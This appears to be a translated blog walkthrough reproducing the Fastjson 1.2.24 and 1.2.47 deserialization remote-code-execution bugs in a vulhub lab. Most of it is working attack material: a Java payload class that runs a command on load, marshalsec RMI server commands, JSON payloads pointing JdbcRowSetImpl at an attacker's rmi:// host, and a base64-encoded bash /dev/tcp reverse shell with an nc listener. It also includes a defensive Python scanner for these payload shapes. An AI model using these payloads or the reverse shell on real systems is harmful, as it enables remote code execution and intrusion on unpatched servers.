Fastjson 1.2.24 deserialization vulnerability reappears

1. Vulnerability introduction

Fastjson is a Java-based JSON parser/generator, and FastjsonEngine is one of the JSON processing engines in Pippo. Pippo 1.11.0 uses a Fastjson version before 1.2.25, whose parseObject has a security vulnerability: when Fastjson's autoType processes a JSON object it does not verify the class named in the @type field. An attacker can therefore pass in a dangerous class that connects to a remote RMI host, and the malicious class loaded from there executes code on the affected versions.

Vulnerability affected versions

Fastjson < 1.2.25

Vulnerability exploitation principle:

The attacker sends a malicious JSON payload in the request body. When the vulnerable version processes the JSON object it does not filter the @type field, so the attacker can pass in the malicious TemplatesImpl class. This class has a field called _bytecodes, and some of its methods generate Java instances from that bytecode. Fastjson thus lets the attacker supply a class through this field, and the class's constructor runs as soon as the instance is generated.

2. Building the vulnerable environment

Ubuntu target machine ip: 192.168.241.129

Kali attacker machine ip: 192.168.241.128

In vulhub, enter /vulhub-master/fastjson/1.2.24-rce

Use command:

docker-compose up -d

Visit ip:8090

http://192.168.241.129:8090

After the environment is running, visit http://your-ip:8090 to see the output in JSON format.


3. Reproducing the vulnerability

1. First compile and upload the command execution code, TouchFile.java

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    // Static initializer: runs as soon as the target JVM loads this class
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Save the above code as TouchFile.java and, in the same directory, run

javac TouchFile.java

After execution, a TouchFile.class file will be generated.

2. Use the Java deserialization tool marshalsec to start the RMI server
git clone https://github.com/mbechler/marshalsec

After downloading, enter the directory, open a command prompt, and compile with the following command:

mvn clean package -DskipTests    // make sure Maven is installed before using the mvn command

With the help of the marshalsec project, start an RMI server that listens on port 9999 and points to the remote class TouchFile.class to be loaded and executed:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.241.128:4444/#TouchFile" 9999


3. In the directory containing the compiled class file, use Python to start an HTTP server:
python -m SimpleHTTPServer 4444


SimpleHTTPServer is a module that ships with Python 2 and acts as a simple web server; in Python 3 it was merged into the http.server module. If no port number is given it defaults to port 8000, and any host on the LAN can reach it at http://IP:8000.

Python 2 syntax: python -m SimpleHTTPServer
Python 3 syntax: python -m http.server

4. Send the payload and get the reverse shell

Send the payload containing the RMI address to the target server:

POST / HTTP/1.1
Host: 192.168.241.129:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.241.128:9999/TouchFile",
        "autoCommit":true
    }
}


5. Check the reverse shell listener and enter the target machine to check whether the command was executed.

You can see the listener output showing that the connection has been established.


Enter the target machine

View the container id

docker ps

Execute the following command to check whether the remote command is executed:

docker exec -it 9ec77798e0bf /bin/bash


You can see that the execution was successful (the file /tmp/success exists).

If you want to change the command that gets executed, just change the following line in TouchFile.java:

String[] commands = {"touch", "/tmp/success"};

4. Fastjson 1.2.47 deserialization vulnerability reproduction

1. Manual reproduction

The basic steps are the same as above.

The PoC is as follows:

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://192.168.241.128:9999/Exploit",
        "autoCommit": true
    }
}
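
As an added example (mine, not from the original post, vulhub, or the Fastjson project): a Python screen a defender can run over captured JSON request bodies to spot both payload shapes shown in this post, the direct @type on JdbcRowSetImpl used against 1.2.24 and the java.lang.Class/val wrapper used against 1.2.47, plus any rmi:// or ldap:// JNDI URL. The sample bodies are constructed from this post's PoCs; the full TemplatesImpl class name and the ldap scheme are my additions.

```python
import json
from typing import Any, List, Tuple

# Gadget classes named in this post: JdbcRowSetImpl in both PoCs, TemplatesImpl in
# the "exploitation principle" section (its full class name is my addition).
DANGEROUS_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
}
# URL schemes that JdbcRowSetImpl.dataSourceName hands to a JNDI lookup.
JNDI_SCHEMES = ("rmi://", "ldap://")

# Constructed sample bodies: the two payload shapes from this post, plus a benign one.
SAMPLE_1224 = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
               '"dataSourceName":"rmi://192.168.241.128:9999/TouchFile","autoCommit":true}}')
SAMPLE_1247 = ('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
               '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
               '"dataSourceName":"rmi://192.168.241.128:9999/Exploit","autoCommit":true}}')
SAMPLE_BENIGN = '{"name":"vulhub","url":"http://192.168.241.129:8090"}'

def scan_fastjson_body(body: str) -> List[Tuple[str, str]]:
    """Return (json_path, reason) findings for one JSON request body.

    Flags an @type naming a gadget class, the 1.2.47-style java.lang.Class/val
    wrapper that pre-caches one, and any string that is a JNDI lookup URL.
    Bad JSON becomes a finding instead of an exception so a log sweep keeps going.
    """
    try:
        doc = json.loads(body)
    except ValueError as exc:
        return [("$", f"unparseable JSON: {exc}")]
    findings: List[Tuple[str, str]] = []
    _walk(doc, "$", findings)
    return findings

def _walk(node: Any, path: str, findings: List[Tuple[str, str]]) -> None:
    if isinstance(node, dict):
        typ, val = node.get("@type"), node.get("val")
        if isinstance(typ, str) and typ in DANGEROUS_CLASSES:
            findings.append((path, f"@type names gadget class {typ}"))
        elif typ == "java.lang.Class" and isinstance(val, str) and val in DANGEROUS_CLASSES:
            findings.append((path, f"java.lang.Class wrapper pre-caches {val}"))
        for key, value in node.items():  # nested objects can hide the same tricks
            _walk(value, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk(value, f"{path}[{i}]", findings)
    elif isinstance(node, str) and node.lower().startswith(JNDI_SCHEMES):
        findings.append((path, f"JNDI lookup URL {node}"))
```

The fix on the application side is upgrading Fastjson past the affected versions and keeping autoType disabled; this screen only helps find attempts in logs or at a WAF.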

2. Reproduce using tools

Download link:

https://github.com/zhzyker/exphub
fastjson_tool.jar
fastjson-1.2.47_rce.py

Host B (the attacker machine) starts the RMI service and serves the remote malicious Java class. The reverse-shell command below must be base64-encoded before it is passed to the server:

bash -i >& /dev/tcp/192.168.241.128/6666 0>&1    // needs to be base64-encoded
java -cp fastjson_tool.jar fastjson.HRMIServer 192.168.241.128 9998 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNjY2NiAwPiYx==}|{base64,-d}|{bash,-i}"


Start nc to listen on port 6666

nc -lnvp 6666

Send the payload that exploits the Fastjson deserialization vulnerability, so that the target machine contacts the RMI service and executes the remote command.

python3 fastjson-1.2.47_rce.py http://192.168.241.129:8090 rmi://192.168.241.128:9998/Object


However, no reverse shell came back.


Source: blog.csdn.net/huangyongkang666/article/details/124200403